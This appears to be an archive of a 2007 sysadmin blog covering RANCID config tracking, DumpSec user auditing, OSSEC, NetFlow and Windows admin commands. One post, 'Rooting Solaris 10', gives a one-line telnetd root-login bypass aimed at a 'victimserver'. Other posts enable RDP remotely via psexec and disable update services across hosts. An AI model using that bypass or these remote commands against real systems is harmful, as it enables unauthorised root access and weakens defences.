Sunday, April 01, 2007

Configuration Management with Rancid

Hey folks!

Don't you guys think it is a very tedious process to keep track of your networking devices' configuration? Yeah, you know... > copy run-config/start-config tftp ip.address

So, instead of wasting my time doing that manually, I use Rancid + CVSWeb to monitor and keep track of my Cisco devices' configuration changes. As usual, my favourite platform is FreeBSD. For the installation process, refer to this tutorial.

After installation, several configurations need to be made, especially ~/.cloginrc, which stores all your authentication methods and passwords, and router.db, which stores information about the routers. In .cloginrc you can define what type of login method you want to use, either telnet or SSH. For example:

# .cloginrc: the router (or glob) comes first, then the login method,
# and on the password line the VTY password followed by the enable password.
# Keep this file mode 600; clogin complains when others can read it.
add method ip.of.the.router ssh
add password ip.of.the.router passwordbongok passwordbongek

To test whether it's working or not, you can use clogin, a tool which is part of rancid.

$ clogin ip.of.the.router

If you can log in and manage to get into global and configuration mode, then you're good. After that, all you need to do is start rancid by typing rancid-run. Here is the screenshot of my cvsweb.



So the last step is to make sure rancid checks the routers for configuration changes every hour. All you need is crontab.

@hourly /usr/local/bin/rancid/rancid-run

That's it.
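As an added illustration (not RANCID's own code, and not the original post's), the Python script below does in miniature what rancid-run does for each device: normalise the fetched config, drop the lines that change on every poll, diff against the stored copy and report only real changes. The device name, both configs and the volatile-line patterns are constructed samples.

```python
"""Miniature of a RANCID-style poll: normalise, diff, report real changes.
Added example, not RANCID's code; all device data here is constructed."""
import difflib
import re

# Lines that differ on every fetch without the configuration really changing.
# Constructed list in the spirit of the noise RANCID filters before committing.
VOLATILE = [
    re.compile(r"^! Last configuration change at "),
    re.compile(r"^! NVRAM config last updated at "),
    re.compile(r"^ntp clock-period "),
]


def normalize(config):
    """Strip trailing whitespace and drop volatile lines."""
    kept = []
    for line in config.splitlines():
        line = line.rstrip()
        if any(pat.match(line) for pat in VOLATILE):
            continue
        kept.append(line)
    return kept


def diff_configs(stored, fetched, device):
    """Unified diff of the normalised configs; empty when nothing real changed."""
    return list(difflib.unified_diff(
        normalize(stored), normalize(fetched),
        fromfile=device + " (stored)", tofile=device + " (fetched)", lineterm=""))


def changed_lines(stored, fetched, device):
    """Just the added/removed lines, which is what a change alert should carry."""
    return [line for line in diff_configs(stored, fetched, device)
            if line[:1] in ("+", "-") and not line.startswith(("+++", "---"))]


def poll(device, stored, fetched):
    """Return (changed, diff). A real poller would commit `fetched` to the
    repository and mail the diff whenever changed is True."""
    diff = diff_configs(stored, fetched, device)
    return (len(diff) > 0, diff)


# Constructed sample: the stored copy and two later fetches of one router.
STORED = """\
! Last configuration change at 10:00:01 UTC Sun Apr 1 2007
hostname core-rtr1
ntp clock-period 17179870
snmp-server community public RO
line vty 0 4
 transport input ssh
"""
# Only the timestamp and clock-period moved: no real change.
FETCH_NOISE_ONLY = STORED.replace("10:00:01", "11:00:02").replace("17179870", "17179871")
# Telnet was re-enabled on the vty lines: a change an operator wants to see.
FETCH_REAL_CHANGE = FETCH_NOISE_ONLY.replace(" transport input ssh", " transport input telnet ssh")


if __name__ == "__main__":
    for label, fetched in (("noise only", FETCH_NOISE_ONLY), ("real change", FETCH_REAL_CHANGE)):
        changed, diff = poll("core-rtr1", STORED, fetched)
        print(f"{label}: changed={changed}")
        print("\n".join(diff))
```

The point of the VOLATILE list is the same as RANCID's own filtering: without it the hourly cron job would commit a "change" on every run and the diff mails would train everyone to ignore them.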

Auditing User Accounts in Windows 2003

It has been a very, very long time...

I've been assigned to list user IDs, their groups, lock status and active status. So I used this tool from Somarsoft called DumpSec, with a little bit of help from unixtools.

Here are the tricks:

1. Dumpsec.exe /computer=\\computer.ip /rpt=users /saveas=csv /outfile=c:\fileku.txt

It will produce something like the output below:

3/16/2007 3:47 PM - Somarsoft DumpSec (formerly DumpAcl) - \\computer.ip
****Name,FullName,AccountType,Comment,HomeDrive,HomeDir,Profile,LogonScript,Workstations,PswdCanBeChanged,PswdLastSetTime,PswdRequired,PswdExpires,PswdExpiresTime,AcctDisabled,AcctLockedOut,AcctExpiresTime,LastLogonTime,LastLogonServer,LogonHours,RasDialin,RasCallback,RasCallbackNumber

*********,,****,Built-in account for administering the computer/domain,,,,,,Yes,3/23/2006 3:52 PM,Yes,No,Never,No ,No ,Never,4/12/2006 10:37 AM,10.20.201.13,All,No ,None,
***,***,***,,,,,,,Yes,8/21/2006 10:19 AM,Yes,No ,Never,No ,No ,Never,Never,10.20.201.13,All,No ,None,
Guest,,****,Built-in account for guest access to the computer/domain,,,,,,No ,3/7/2007 9:12 AM,No ,No ,Never,Yes,No ,Never,Never,10.20.201.13,All,No ,None,
SQLDebugger,SQLDebugger,****,This **** account is used by the Visual Studio .NET Debugger,,,,,,No ,2/15/2006 5:02 PM,Yes,No ,Never,No ,No ,Never,Never,10.20.201.13,All,No ,None,
SUPPORT_388945a0,CN=Microsoft Corporation,L=Redmond,S=Washington,C=US,****,This is a vendor's account for the Help and Support Service,,,,,,No ,2/10/2006 11:06 AM,Yes,No ,Never,Yes,No ,Never,Never,10.20.201.13,All,No ,None,
****,,****,Built-in account for administering the computer/domain,,,,,,Yes,10/4/2006 4:31 PM,Yes,No ,Never,No ,No ,Never,3/1/2007 3:22 PM,10.20.201.13,All,No ,None,

All I need are fields 1, 2, 15 and 16, so I did this. (Actually there are several ways to do this; one of them is to use awk.)

2. cat c:\fileku.txt | cut -d "," -f1,2,15,16 >> listuser.csv

Here is the result:

3/13/2007 4:01 PM - Somarsoft DumpSec (formerly DumpAcl) - \\computer.ip
****Name,FullName,AccountType,AcctDisabled,AcctLockedOut

ASPNET,ASP.NET Machine Account,****,No ,No
******,******,****,No ,No
Guest,,****,Yes,No
*******,Internet Guest Account,****,No ,No
SQLDebugger,SQLDebugger,****,No ,No
SUPPORT_388945a0,CN=Microsoft Corporation,L=Redmond,Yes,No
****,,****,No ,No
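A caveat on the cut approach, as an added example that is not part of the original post: DumpSec does not quote a FullName that itself contains commas, so in the SUPPORT_388945a0 row every later field shifts and -f15,16 no longer lands on AcctDisabled/AcctLockedOut (the symptom is visible in the result above, where that row's third column reads L=Redmond instead of the account type). The Python script below selects columns by header name, reads the status flags from the right-hand end of the row so a shifted FullName cannot move them, strips the trailing space DumpSec leaves in "No ", and flags rows whose field count disagrees with the header. The report text is a constructed sample in the same layout as the output above; account names other than Guest and SUPPORT_388945a0 are made up.

```python
"""Parse a DumpSec users report by column name, robust to unquoted commas.
Added example, not DumpSec's or the post's code; the report is constructed."""
import csv

STATUS_COLUMNS = ("AcctDisabled", "AcctLockedOut")

# Constructed sample in the same shape as DumpSec's /rpt=users /saveas=csv output.
SAMPLE_REPORT = r"""
3/16/2007 3:47 PM - Somarsoft DumpSec (formerly DumpAcl) - \\computer.ip
Name,FullName,AccountType,Comment,HomeDrive,HomeDir,Profile,LogonScript,Workstations,PswdCanBeChanged,PswdLastSetTime,PswdRequired,PswdExpires,PswdExpiresTime,AcctDisabled,AcctLockedOut,AcctExpiresTime,LastLogonTime,LastLogonServer,LogonHours,RasDialin,RasCallback,RasCallbackNumber

Administrator,,User,Built-in account for administering the computer/domain,,,,,,Yes,3/23/2006 3:52 PM,Yes,No ,Never,No ,No ,Never,4/12/2006 10:37 AM,10.20.201.13,All,No ,None,
Guest,,User,Built-in account for guest access to the computer/domain,,,,,,No ,3/7/2007 9:12 AM,No ,No ,Never,Yes,No ,Never,Never,10.20.201.13,All,No ,None,
SUPPORT_388945a0,CN=Microsoft Corporation,L=Redmond,S=Washington,C=US,User,This is a vendor's account for the Help and Support Service,,,,,,No ,2/10/2006 11:06 AM,Yes,No ,Never,Yes,No ,Never,Never,10.20.201.13,All,No ,None,
svc_backup,Backup service,User,,,,,,,Yes,1/5/2007 8:00 AM,Yes,No ,Never,No ,Yes,Never,3/1/2007 3:22 PM,10.20.201.13,All,No ,None,
"""


def parse_users(report_text):
    """One dict per account: Name, FullName, AcctDisabled, AcctLockedOut, misaligned."""
    header = None
    accounts = []
    for row in csv.reader(report_text.strip().splitlines()):
        if not row:
            continue
        if header is None:
            # Everything before the column header (the DumpSec banner) is skipped.
            if "AcctDisabled" in row:
                header = row
            continue
        extra = len(row) - len(header)
        rec = {"Name": row[0].strip(), "misaligned": extra != 0}
        if extra < 0:  # truncated row: nothing beyond the name is trustworthy
            rec.update(FullName="", AcctDisabled="?", AcctLockedOut="?")
            accounts.append(rec)
            continue
        # Unquoted commas in FullName push every later column to the right, but
        # the tail of the row keeps its position relative to the end, so the
        # status flags are read with a negative index derived from the header.
        for col in STATUS_COLUMNS:
            rec[col] = row[header.index(col) - len(header)].strip()
        # Heuristic (assumption): any surplus fields belong to FullName.
        rec["FullName"] = ",".join(row[1:2 + extra]).strip()
        accounts.append(rec)
    return accounts


def review_list(accounts):
    """Accounts an auditor looks at first: disabled (candidates for removal),
    locked out (possible password guessing or stale credentials), and rows
    whose field count did not match the header."""
    return [a["Name"] for a in accounts
            if a["AcctDisabled"] == "Yes" or a["AcctLockedOut"] == "Yes" or a["misaligned"]]


if __name__ == "__main__":
    accounts = parse_users(SAMPLE_REPORT)
    for a in accounts:
        note = "  (field count mismatch, status read from the right)" if a["misaligned"] else ""
        print(f'{a["Name"]:18} disabled={a["AcctDisabled"]:3} locked={a["AcctLockedOut"]:3}{note}')
    print("review:", review_list(accounts))
```

Run it against a real report by replacing SAMPLE_REPORT with the contents of c:\fileku.txt; the banner line is skipped automatically because the header is located by its column names.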


So who said MS Windows is boring? The operating system is just a tool, be it Solaris, BSD, Windows, Linux or whatever it is; all you need is knowledge to make it fun!

Wednesday, February 14, 2007

Rooting Solaris 10

Rooting Solaris 10 seemed like an impossible mission, but not when you have telnetd running on that Solaris machine. Hey!! I thought we were living in 2007 and supposedly telnetd should be long gone, replaced by SSHD. :=D


telnet -l "-froot" victimserver



Peace y'all!

Tuesday, January 30, 2007

Why netflow?

Recently, we have been facing network congestion, especially on our WAN link.


We tried to find the culprit for this problem, but nothing much came out of Cacti and ntop. So we decided to download and test a NetFlow reporting tool called Netflow Tracker from Crannog Software. The installation is very easy, and we managed to find the cause of the trouble in just a few minutes.


After identifying the source of the problem, we decided to disconnect the server from the network. Traffic flowed back to normal.

Disabling Windows Autoupdate

If you have a patch management system, you don't need to enable the AutoUpdate service. Why?

1. Reduced bandwidth consumption: instead of every machine connecting to and downloading from *.microsoft.com, all you need is one centralized server.
2. Reduced logging noise in network devices, especially the firewall.
3. Reduced resource usage, since fewer services run automatically.

So how to do it?

I use GNU Awk, and the commands must be run as a domain administrator.

1. net view | gawk "{ print $1 }" > hostlist
2. for /f %i in (hostlist) do sc \\%i stop wuauserv
3. for /f %i in (hostlist) do sc \\%i config start= disabled


That's it.

Monday, January 22, 2007

Enabling Windows Remote Desktop using command line

Sometimes you need to access a remote Windows machine by RDP, but the problem is that RDP is not enabled by default. Using psexec and reg add, you can enable RDP remotely.

psexec \\computername -u username reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0

Tuesday, January 16, 2007

OSSEC HIDS + Web Interface

After testing several HIDS like Samhain and Osiris, I decided to give OSSEC a try. BTW, what the heck is OSSEC? OSSEC is an Open Source Host-based Intrusion Detection System. It performs log analysis, integrity checking, Windows registry monitoring, rootkit detection, time-based alerting and active response. The reason I picked OSSEC over Samhain or Osiris is its simplicity.

OSSEC is a client-server solution, so you need a server and clients. My server runs on FreeBSD and the clients run on Windows/Linux/Solaris/BSD. The installation process is very straightforward, so please visit here.

For monitoring purposes, I use ossec-wui, a web-based interface for alerting. Installation is also very straightforward, except that I can't view alerts from the OSSEC log file. I already added the apache user to the ossec group (by editing /etc/group), but the result is still the same. On the OSSEC mailing list, one of the guys pointed out that os_lib_alerts.php does not return the right user group. The solution is to comment out that line:

/* Getting group information */
$evt_group = strstr($buffer, "-");
if($evt_group === FALSE)
{
    /* Invalid group */
    // continue;      <= comment out this line
}


So now my ossec-wui works like a charm. Here's the screenshot.


Further googling showed that I need to upgrade my OSSEC from 0.93 to 1.0 in order to overcome this problem. Without much hesitation, I downloaded the latest version and ran ./setup.sh. That's it. Job done for today.

Sunday, January 14, 2007

Reset "sa" in MSDE

Yeah, shit does happen, especially when you don't plan properly. I forgot the password for my MSDE instance, which stores most of the EventViewer alerts. Luckily, the built-in Administrator account can be used to reset the MSDE password. Here's the trick:

osql -E -d databasename -Q "sp_password NULL, 'newpassword', 'sa'"

-E  use a trusted connection (Windows authentication)
-Q  execute the query and exit

For more options, run osql /?